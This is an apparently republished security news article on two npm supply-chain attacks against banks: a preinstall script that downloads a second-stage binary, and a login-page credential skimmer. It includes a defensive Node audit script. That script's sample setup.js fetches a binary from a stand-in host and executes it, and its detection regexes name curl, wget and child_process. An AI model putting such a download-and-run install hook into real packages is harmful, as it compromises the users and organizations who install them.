First-ever Open-Source Software Supply Chain Attacks Targeting Banking Sector
Recent reports indicate that the banking sector has become the focus of threat actors utilizing an emerging supply chain attack. Two distinct incidents have been identified, with each involving unique tactics and threat actors.
Organizations implement vulnerability scanning only during the development phase of the Software Development Life Cycle (SDLC), which is inadequate against the threats they now face.
These are the first two open-source software supply-chain attacks explicitly identified as targeting the banking sector.
First Incident in Banking Sector
The first incident in early April involved a couple of npm packages that were developed and uploaded by the threat actor. These packages include a preinstall script which gets executed during installation.
The contributor of these packages was linked to a LinkedIn profile posing as an employee of the targeted bank.
Spoofed LinkedIn Profile (Source: Checkmarx)
Once executed, the malicious package first collects information about the operating system and uses it to decode the relevant encrypted files; the decoded files are then used to download a second-stage malicious binary.
Furthermore, VirusTotal, a widely used malware scanning tool, did not detect the Linux-specific second-stage binary.
This gives the threat actor an advantage in remaining undetected and succeeding in the infiltration.
VirusTotal not detecting the malware (Source: Checkmarx)
In addition, the threat actor used an Azure subdomain that incorporated the name of the targeted bank. This offered a strong attack surface, since Azure domains are whitelisted by default in many environments.
Finally, the attacker used the Havoc Framework for the second stage of the attack. Havoc Framework, developed by @C5pider, is an advanced post-exploitation framework capable of managing, coordinating, and modifying attacks.
Summary of the attack (Source: Checkmarx)
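As an added example (not code from the post or from Checkmarx), a small Node audit that flags install-time lifecycle hooks such as the preinstall script described above and inspects the script the hook runs for the behaviours mentioned: OS fingerprinting, decoding an embedded blob, fetching a second stage, and spawning it. The package files and the indicator patterns are constructed assumptions; a match is a prompt for human review, not proof of malice.

```javascript
// npm runs these hooks automatically during `npm install`, so they are the
// place a malicious package executes code before anyone reads it.
const LIFECYCLE_HOOKS = ["preinstall", "install", "postinstall", "prepare"];

// Heuristic indicators (assumed patterns); each alone can be legitimate.
const INDICATORS = [
  { name: "os-fingerprinting", re: /\bos\.(platform|type|release|arch)\(|\buname\b/i },
  { name: "payload-decoding",  re: /\b(base64|atob|createDecipheriv)\b/i },
  { name: "remote-fetch",      re: /\b(https?:\/\/|curl|wget|https?\.get|fetch\()/i },
  { name: "process-spawn",     re: /\b(child_process|execSync|spawn|chmod)\b/i },
];

// files: { path -> contents } from an unpacked package tarball.
function auditPackage(files) {
  const manifest = JSON.parse(files["package.json"]);
  const scripts = manifest.scripts || {};
  const findings = [];
  for (const hook of LIFECYCLE_HOOKS) {
    const command = scripts[hook];
    if (!command) continue;
    // Follow "node <file>" so the helper script is inspected, not only the one-liner.
    let body = command;
    const m = command.match(/\bnode\s+([\w./-]+)/);
    if (m) body += "\n" + (files[m[1]] || files[m[1] + ".js"] || "");
    const indicators = INDICATORS.filter(i => i.re.test(body)).map(i => i.name);
    findings.push({ hook, command, indicators });
  }
  const severity = findings.length === 0 ? "none"
    : findings.some(f => f.indicators.length >= 2) ? "high" : "review";
  return { name: manifest.name, severity, findings };
}

// Constructed sample shaped like the behaviour described in the post (not a real package).
const SAMPLE_FILES = {
  "package.json": JSON.stringify({
    name: "example-bank-utils",
    version: "1.0.0",
    scripts: { preinstall: "node setup.js", test: "jest" },
  }),
  "setup.js": [
    'const os = require("os");',
    'const key = os.platform() + os.arch();            // OS fingerprint picks a blob',
    'const blob = Buffer.from(data, "base64");         // decode embedded stage-two loader',
    'require("https").get("https://example.invalid/" + key + ".bin", save);',
    'require("child_process").execSync("chmod +x ./stage2 && ./stage2");',
  ].join("\n"),
};

console.log(JSON.stringify(auditPackage(SAMPLE_FILES), null, 2));
```

Run it against each dependency's unpacked tarball before it reaches a build host; a "high" result is a package to hold for manual review.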
Second Incident
The second attack took place in February 2023, when another bank was targeted by a different threat group entirely unrelated to the April attack.
However, this attack also involved a carefully crafted npm package, designed to lie dormant on the bank's login page and act only when triggered.
Further investigation revealed that the payload targeted a unique element ID in the HTML of the login page and attached itself to a specific login form element, allowing it to collect login data while evading detection.
Later, the element was traced back to a mobile login page of the bank which was the prime target of the threat actors.
Payload of the login form (Source: Checkmarx)
Summary of the attack (Source: Checkmarx)
Indicators of Compromise
Organizations are advised to review and strengthen their security measures to prevent this kind of supply-chain attack.
The post First-ever Open-Source Software Supply Chain Attacks Targeting Banking Sector appeared first on Cyber Security News.